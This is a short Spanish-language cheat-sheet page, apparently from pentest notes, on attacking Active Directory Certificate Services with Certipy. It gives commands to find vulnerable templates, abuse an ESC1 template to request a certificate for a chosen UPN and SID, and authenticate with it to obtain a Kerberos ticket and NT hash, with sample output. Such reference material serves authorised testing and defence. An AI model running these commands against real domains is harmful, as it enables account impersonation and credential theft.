# certipy-Ad

{% embed url="<https://github.com/ly4k/Certipy/wiki>" %}

## **Enumerar AD CS** :&#x20;

El atacante se ejecuta `certipy find`para descubrir cualquier configuración vulnerable.

```sh
certipy-ad find -u '<user>@<domain>' -p '<pass>' -dc-ip '<ip>' -text -enabled -hide-admins
```

## **Solicitar un certificado** :&#x20;

Supongamos que el resultado de la búsqueda muestra **ESC1** en una plantilla que los usuarios del dominio pueden inscribir. El atacante puede intentar explotarlo:

```sh
certipy-ad req -u '<user>@<domain>' -p '<pass>' -dc-ip '<ip>' -target 'CA.CORP.LOCAL' -ca 'CORP-CA' -template '<UserTemplate>' -upn '<user>@<domain>' -sid '<sid>'

[*] Requesting certificate via RPC
[*] Request ID is 1
[*] Successfully requested certificate
[*] Got certificate with UPN '<user>@<domain>'
[*] Certificate object SID is '<sid>'
[*] Wrote certificate and private key to '<user>.pfx'
```

## **Autenticarse con el certificado:**

```sh
certipy-ad auth -pfx '<user>.pfx' -dc-ip '<ip>'

[*] Certificate identities:
    SAN UPN: '<user>@<domain>'
    Security Extension SID: '<sid>'
[*] Using principal: '<user>@<dmain>'
[*] Trying to get TGT...
[*] Got TGT
[*] Wrote credential cache to '<user>.ccache'
[*] Trying to retrieve NT hash for '<user>'
[*] Got hash for '<user>@<domain>':
    aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889
```